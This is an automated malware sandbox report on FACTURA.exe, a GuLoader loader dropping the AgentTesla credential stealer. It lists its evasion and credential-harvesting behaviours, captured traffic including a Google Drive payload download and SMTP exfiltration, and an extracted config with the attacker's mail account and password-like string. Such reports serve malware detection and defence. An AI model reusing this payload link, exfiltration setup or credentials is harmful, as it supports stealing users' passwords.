Loading ...

Play interactive tourEdit tour

Windows Analysis Report FACTURA.exe

Overview

General Information

Sample Name:FACTURA.exe
Analysis ID:1538
MD5:5086ecea441041d6101cf29faf76659d
SHA1:2250015bcfd5a875c838606e75aae8691990557f
SHA256:cdae2d1f513980104d3b0e65fdf8bb7afe27ec1e2c37cd6fdd638a71dc7cf91d
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • FACTURA.exe (PID: 2452 cmdline: 'C:\Users\user\Desktop\FACTURA.exe' MD5: 5086ECEA441041D6101CF29FAF76659D)
    • RegAsm.exe (PID: 7500 cmdline: 'C:\Users\user\Desktop\FACTURA.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7348 cmdline: 'C:\Users\user\Desktop\FACTURA.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comnappiboioffice203@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.67798697025.00000000022D0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 7348JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 7348JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 109.169.39.245, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7348, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49822

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: FACTURA.exe.2452.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comnappiboioffice203@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: FACTURA.exeReversingLabs: Detection: 26%
            Source: FACTURA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.11.20:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49789 version: TLS 1.2

            Networking:

            barindex
            Source: Joe Sandbox ViewASN Name: IOMART-ASGB IOMART-ASGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 109.169.39.245 109.169.39.245
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/o2a761ub6bqdamuas6k5rune3dij162a/1633536225000/00014782062933200622/*/1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-88-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49822 -> 109.169.39.245:587
            Source: global trafficTCP traffic: 192.168.11.20:49822 -> 109.169.39.245:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000008.00000002.72351918857.000000001E05B000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpString found in binary or memory: http://DXdVhu.com
            Source: RegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000008.00000002.72358668690.000000002022D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: RegAsm.exe, 00000008.00000003.67775548273.00000000012B3000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000008.00000002.72358668690.000000002022D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: RegAsm.exe, 00000008.00000002.72352422895.000000001E0C8000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: RegAsm.exe, 00000008.00000003.67775548273.00000000012B3000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000008.00000002.72352422895.000000001E0C8000.00000004.00000001.sdmpString found in binary or memory: http://mail.reyesyasociados.com
            Source: RegAsm.exe, 00000008.00000002.72358668690.000000002022D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: RegAsm.exe, 00000008.00000003.67771771830.00000000012AC000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000008.00000002.72340793741.000000000126D000.00000004.00000020.sdmpString found in binary or memory: https://doc-0o-88-docs.googleusercontent.com/
            Source: RegAsm.exe, 00000008.00000003.67771792759.00000000012B3000.00000004.00000001.sdmpString found in binary or memory: https://doc-0o-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/o2a761ub
            Source: RegAsm.exe, 00000008.00000002.72340793741.000000000126D000.00000004.00000020.sdmpString found in binary or memory: https://doc-0o-88-docs.googleusercontent.com/h
            Source: RegAsm.exe, 00000008.00000002.72340502392.0000000001228000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000008.00000002.72340502392.0000000001228000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/n
            Source: RegAsm.exe, 00000008.00000002.72340147408.0000000001180000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo
            Source: RegAsm.exe, 00000008.00000003.67771792759.00000000012B3000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWoFGPt_vtAzvPFBWj58
            Source: RegAsm.exe, 00000008.00000002.72340147408.0000000001180000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWowininet.dllMozilla/5
            Source: RegAsm.exe, 00000008.00000002.72352717386.000000001E0FE000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72351571622.000000001E014000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000008.00000002.72352717386.000000001E0FE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000008.00000002.72352717386.000000001E0FE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000008.00000002.72352717386.000000001E0FE000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000008.00000002.72352422895.000000001E0C8000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: RegAsm.exe, 00000008.00000002.72351571622.000000001E014000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000008.00000002.72352573428.000000001E0EC000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.68675247771.0000000001321000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpString found in binary or memory: https://tCEASVGm7tT.org
            Source: RegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/o2a761ub6bqdamuas6k5rune3dij162a/1633536225000/00014782062933200622/*/1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-88-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.11.20:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49789 version: TLS 1.2
            Source: FACTURA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E411308_2_00E41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E4BA708_2_00E4BA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E43A508_2_00E43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E443208_2_00E44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E4B5588_2_00E4B558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E44E788_2_00E44E78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E4C7D08_2_00E4C7D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E43A458_2_00E43A45
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E483308_2_00E48330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E436FC8_2_00E436FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E437088_2_00E43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012191808_2_01219180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0121D8378_2_0121D837
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01219BD08_2_01219BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01214EB08_2_01214EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012144F88_2_012144F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012133308_2_01213330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDA69888_2_1CDA6988
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDA01588_2_1CDA0158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDA14208_2_1CDA1420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB48B88_2_1CDB48B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDBE3188_2_1CDBE318
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB27208_2_1CDB2720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB34968_2_1CDB3496
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB34B18_2_1CDB34B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB345E8_2_1CDB345E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB340B8_2_1CDB340B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB357F8_2_1CDB357F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB35358_2_1CDB3535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB32D18_2_1CDB32D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB368E8_2_1CDB368E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB361B8_2_1CDB361B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB33B78_2_1CDB33B7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB33638_2_1CDB3363
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB330A8_2_1CDB330A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1DE65E088_2_1DE65E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1DE64ACC8_2_1DE64ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1DE66AF18_2_1DE66AF1
            Source: FACTURA.exe, 00000001.00000002.67797685075.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTurnera7.exe vs FACTURA.exe
            Source: FACTURA.exeBinary or memory string: OriginalFilenameTurnera7.exe vs FACTURA.exe
            Source: FACTURA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\FACTURA.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: FACTURA.exeReversingLabs: Detection: 26%
            Source: FACTURA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\FACTURA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\FACTURA.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe' Jump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\FACTURA.exeFile created: C:\Users\user\AppData\Local\Temp\~DFADBEA32E27BF3413.TMPJump to behavior
            Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@6/1@4/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.67798697025.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_0040474B push 6C6AB922h; iretd 1_2_0040475E
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_022D107C push ebx; retf 1_2_022D1004
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_022D0EB0 push 132FDBECh; retf 1_2_022D0EB5
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_022D3F2D push ecx; ret 1_2_022D3F42
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_022D4D1E pushfd ; retf 1_2_022D4D1F
            Source: C:\Users\user\Desktop\FACTURA.exeCode function: 1_2_022D0FF2 push ebx; retf 1_2_022D1004
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00F0C3D5 push 56169DDFh; iretd 8_2_00F0C409
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1CDB24E8 pushfd ; iretd 8_2_1CDB2531
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
